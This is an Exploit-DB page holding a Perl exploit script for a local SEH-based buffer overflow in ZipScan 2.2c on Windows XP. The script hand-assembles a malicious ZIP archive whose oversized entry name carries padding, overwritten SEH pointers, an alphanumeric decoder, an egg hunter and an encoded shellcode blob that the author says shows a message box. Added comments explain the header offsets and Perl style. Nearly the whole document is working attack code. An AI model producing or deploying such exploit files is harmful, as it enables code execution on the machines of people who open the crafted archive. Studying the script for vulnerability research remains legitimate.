ZipScan 2.2c – Local Overflow (SEH)

  • 作者: Lincoln & corelanc0d3r
    日期: 2010-04-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12035/
  • #!/usr/bin/perl
    # Software: ZipScan 2.2c (.zip)
    # Bug found by: Lincoln
    # Author: Lincoln & corelanc0d3r
    # OS: Windows
    # Tested on : XP SP3 En (VirtualBox)
    # Type of vuln: SEH
    # Greetz to : Corelan Security Team
    # http://www.corelan.be:8800/index.php/security/corelan-team-members/
    #
    # Script provided 'as is', without any warranty.
    # Use for educational purposes only.
    # Do not use this code to do anything illegal !
    #
    # Note : you are not allowed to edit/modify this code.
    # If you do, Corelan cannot be held responsible for any damages this may cause.
    #
    #
    # Code :
    # Banner.  Each entry is printed on its own line; the empty entry after the
    # "EIP Hunters" rule reproduces the blank line the original emitted there.
    my @banner_lines = (
        '|------------------------------------------------------------------|',
        '| __ __|',
        '| _________________/ /___ _____ / /________ _____ ___|',
        '|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |',
        '| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |',
        '| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|',
        '||',
        '| http://www.corelan.be:8800 |',
        '||',
        '|-------------------------------------------------[ EIP Hunters ]--|',
        '',
        '[+] Exploit for ZipScan 2.2c ',
    );
    print "$_\n" for @banner_lines;
    
    
    
    # Output archive name.  It is interpolated unquoted into the shell `del`
    # and into the 2-arg open() at the bottom of the script; being a constant
    # it is harmless here, but see the notes at those lines.
    my $filename="zipscan.zip";
    # Hand-assembled ZIP local file header (signature "PK\x03\x04").  Nothing is
    # computed from the data that follows: the 0x1388 (= 5000) word is the
    # author's "5k" and every other field is a literal.  An archive validator
    # that checks declared sizes against the stream would reject this file
    # before any entry-name handling is reached.
    my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00" .
    "\x88\x13" .# file size: 5k
    "\x00\x00\x00";
    
    # Central directory entry (signature "PK\x01\x02") for the same single
    # entry, carrying the same hard-coded 0x1388 word.
    my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00".
    "\x88\x13". # file size: 5k
    "\x00\x00\x00\x00\x00\x00\x01\x00".
    "\x24\x00\x00\x00\x00\x00\x00\x00";
    
    # End-of-central-directory record (signature "PK\x05\x06"), one entry.
    # 0x13b6 = 5000 + 46 and 0x13a6 = 5000 + 30, matching the author's "+46"
    # and "+30": offsets worked out by hand against a 5000-byte $payload (see
    # the "5k total" note further down).  Nothing recomputes them if the
    # payload length changes.
    my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
    "\xb6\x13\x00\x00". # +46
    "\xa6\x13\x00\x00". # +30
    "\x00\x00";
    
    # Stage-one stub placed directly after the overwritten exception record.
    # Pure constant data; the author's per-group comments below name what each
    # byte group is meant to do.  Nothing in this block runs or is computed at
    # script run time.
    my $decoder =
    #pop edx pop esp
    "\x5b\x5b\x5b\x5b\x5c".
    
    #jmp ebp
    "\x25\x4A\x4D\x4E\x55".
    "\x25\x35\x32\x31\x2A".
    "\x2d\x55\x55\x55\x64".
    "\x2d\x55\x55\x55\x64".
    "\x2d\x56\x55\x56\x51".
    "\x50".
    
    #add ebp, 526h
    "\x25\x4A\x4D\x4E\x55".
    "\x25\x35\x32\x31\x2A".
    "\x2d\x35\x69\x48\x54".
    "\x2d\x25\x69\x48\x54".
    "\x2d\x25\x68\x48\x52".
    "\x50".
    
    #jmp back to decoded op code
    "\x7a\xb5";
    
    #basereg ebp, modified egg hunter mov edx,ebp
    #points egg hunter to unmodified shellcode
    # Stage two: a search stub (author's notes above).  Every character in it
    # is printable alphanumeric ASCII, so byte values give a scanner nothing to
    # key on; the abnormal entry-name length is the detectable property of the
    # archive this script writes.
    my $egg =
    "UYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0".
    "BBABXP8ABuJIOyJB2bPRPjs2shZmfNwLWuSj44ho".
    "nXRWdpVPqdNkXznOrUZJNO45jGKOxgA";
    
    #msg box "Exploited by Corelan Security Team"
    #encoded with Alpha2 base reg edi
    # Final payload: an 8-byte "w00tw00t" tag (the marker a search stub keys
    # on by convention; the script itself does not state this) followed by an
    # alphanumeric-encoded body.  Per the author it only displays a message
    # box; nothing in this script verifies that, so treat the blob as opaque.
    my $shellcode =
    "w00tw00t".
    "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0B".
    "BABXP8ABuJIoy8c9JkgXYt3jTsiQYg9syQYqYbiRiW".
    "9g9QYBiCsrc0CqSssssvW3aqJqzQQV8BpVPqQ4p712".
    "KQQsqv1drBabbP2QRcrTprbw2RaSrpXrpTx2a72RU0".
    "JCyPJrYSzpKPMrkRk59V1qtSuptQZaD75QqRnP2Rnb".
    "rBbQJQVPQ3yV9pBaTPN2Ksa3Q74bPBl0KQSw6BdPLP".
    "NBK3rsfqW0lrlpKBqQFQTpHBlRkpQPnbeppBn2Ksua".
    "vrpWHRpBoswQxPPPuPLTsBpRy1UPQPKQq0KropH51p".
    "QRPPL2kPPPlQVrd0E44pL2kCaruqWpLBlpKpPcd0Cd".
    "uPPRXPCFQpKaJ0LPK2b2JpGSXPNRKw3BJW7Rpsucar".
    "jpKQX53QVf7bpw9BnbKW4PtBlRkw5pQQZ0NBd410I0".
    "orpDqBkppbkPLBnblpOSDPKRPQSpDqV0jaZCQrjBOq".
    "T0M3wqarkSGcxPi3zPQrkPOPIrOG9ROSurKpCrlqUS".
    "D3aUhrqau1Yrn0NPkpB1jsu0tRerq0JpKssqF2nBK3".
    "vPlSr2K2lpKssSZPEpLPC6QSzbkPNPkW5qDRnRKqW4".
    "1RmwHRosISabtcv74rgbLG5fQBj2C0Og2QT1XbfBiW".
    "8sdpOpy2kQEpMv9CyrrpPbHpLpN0PRnQTpN3xRLRp2".
    "rpKrxpM2lpKBoqYpoPKPO2oQiv1seG6QtpMpkF1PnS".
    "yQX0MtrpQrC2lpGsu0LPD54sag2pMtxPNBKw9ROBiR".
    "OPK0OPLRiqRsUQWBXG32x1RPL2pPl0EPppKpOrqPxQ".
    "Ww3Suu2sv2nreVT3u4xV1REPQqspEp50D6RRmChV1p".
    "LaT2D2dczBlSyaXcVQSbFpKroSsqu3v3TblCy2k0rp".
    "PpPpMbKPN78rlarv0pMpMplpNpgQWpl3w2t2fVRpKs".
    "hpC2NpIPoPIpoRiPoCraXPQrTqURQpQpHpEPp73PXQ".
    "T4pQS77aRRnw2G5CtPq0K0kPKGHqSplSuBTaVu6pK0".
    "9QXRCpE6X2p51G2PMv0shG5Pprqt8QRsiqUbPRpSdp".
    "QRUbqrXQTVU1S3rrpPiPQU4PCv8savPQS2Cg5Ue3sC".
    "cV1t8qRW5PBPL0PsQRp0nrbcxpQDpSaPSRp2OPPRRQ".
    "UUhpCpTv1dpbp2B73W9PQPx3rpOpCQIsr2tBppeF1b".
    "XSrpepQu872pPV0BLW6saQXCyRnaxBpPLbf74PEPr0".
    "MCi0IBQqTt1pJprqSrBCsSSRp0QQVp2pKRo1X0PRpt".
    "qpOVPPF6PbkPObqPECtsxSuRzQQ1QA";
    
    #Filler
    # Trailing padding appended after the payload body.
    my $mjunk = "A" x 30;
    
    # --- payload --- 5k total
    # `x` binds tighter than `.`, so this is 22 filler bytes, the search stub,
    # then 3427 more filler bytes.  The counts are what line $nseh/$seh up with
    # the exception record on the tested build; they are specific to it.
    my $junk = "A" x 22 . $egg . "A" x 3427;
    # 4-byte next-SEH and handler values.  The author labels the handler
    # address "universal"; that claim is not verified anywhere in this script.
    my $nseh="\x7a\x06\x41\x41";
    my $seh="\x16\x09\x01\x10"; #universal
    # The string written after each ZIP header (presumably in the entry-name
    # position): filler . SEH record . decoder . shellcode . padding, then a
    # ".txt" suffix so it ends like a text-file name.
    # NOTE(review): the "5k total" above is not enforced; the length print at
    # the end is the only check, and the header constants depend on it.
    my $payload = $junk.$nseh.$seh.$decoder.$shellcode.$mjunk;
    $payload = $payload . ".txt";
    
    # Report the payload length so it can be compared with the hard-coded
    # header fields (nothing else checks them).
    print "[+] Size : " . length($payload)."\n";
    # Windows-only: removes a previous archive via the shell, result unchecked.
    # $filename is a constant so there is no injection here, but the portable,
    # shell-free form is `unlink $filename;`.
    system("del $filename");
    print "[+] Creating new vulnerable file: $filename\n\n";
    # 2-arg open on a bareword handle, no error check, no binmode.  Idiomatic
    # form: `open my $fh, '>', $filename or die "open $filename: $!";` then
    # `binmode $fh;` since the data is binary.  Text-mode output happens not
    # to corrupt this particular data (no \x0a byte occurs in the constants
    # above), so the omission is latent rather than active.
    open(FILE, ">$filename");
    # Layout: local header + name, central-directory entry + name, then the
    # end-of-central-directory record -- a single-entry archive whose entry
    # name is presumably $payload.  Neither print nor close is error-checked,
    # so a short write would go unnoticed.
    print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
    close(FILE);